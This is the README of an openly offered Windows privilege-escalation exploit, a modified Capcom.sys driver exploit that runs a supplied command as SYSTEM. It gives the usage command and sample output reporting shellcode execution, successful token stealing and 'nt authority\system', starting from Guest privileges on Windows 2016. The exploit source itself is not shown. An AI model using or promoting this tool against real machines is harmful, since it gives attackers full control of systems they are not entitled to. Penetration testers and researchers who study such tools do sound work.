This is a quick modification to the Capcom.sys exploit. Instead of spawning a shell like the orginial exploit do, this one execute a command as Admin.
To see the original exploit:
Load the Capcom.sys, then execute this exploit.
.\ExploitCapcom.exe "whoami"
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001D89AC60008
[+] Shellcode was executed
[+] Token stealing was successful
nt authority\system
You need to provide a command as argument otherwise it won't work. Also, you can run only one command at a time.
- Windows 2016 x64 Build 14393 with the Guest privileges
This software is released under the MIT License, see LICENSE.